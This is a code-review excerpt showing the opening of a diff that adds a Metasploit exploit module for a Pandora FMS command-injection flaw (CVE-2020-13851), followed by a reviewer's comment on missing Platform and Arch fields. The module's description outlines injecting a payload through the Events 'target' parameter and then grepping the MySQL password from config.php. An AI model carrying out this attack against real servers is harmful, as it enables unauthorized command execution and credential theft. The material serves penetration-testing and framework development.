modules/exploits/linux/http/pandora_fms_events_exec.rb

```diff
@@ -0,0 +1,221 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Pandora FMS Events Remote Command Execution',
+        'Description' => %q{
+          This module exploits a vulnerability (CVE-2020-13851) in Pandora
+          FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps
+          older versions) in order to execute arbitrary commands.
+
+          This module takes advantage of a command injection vulnerability in the
+          `Events` feature of Pandora FMS. This flaw allows users to execute
+          arbitrary commands via the `target` parameter in HTTP POST requests to
+          the `Events` function. After authenticating to the target, the module
+          attempts to exploit this flaw by issuing such an HTTP POST request,
+          with the `target` parameter set to contain the payload. If a shell is
+          obtained, the module will try to obtain the local MySQL database
+          password via a simple `grep` command on the plaintext
+          `/var/www/html/pandora_console/include/config.php` file.
+
+          Valid credentials for a Pandora FMS account are required. The account
+          does not need to have admin privileges.
+          This module has been successfully tested on Pandora 7.0 NG 744 running
+          on CentOS 7 (the official virtual appliance ISO for this version).
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Fernando Catoira', # Discovery
+            'Julio Sanchez', # Discovery
+            'Erik Wynter' # @wyntererik - Metasploit
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-13851'], # RCE via the `events` feature
+            ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']
+          ],
+        'Targets' =>
+          [
+            [
+              'Linux (x86)', {
+                'Arch' => ARCH_X86,
+                'Platform' => 'linux',
```

Comment:
This module is missing top-level `Platform` and `Arch`. Should be a union of targets.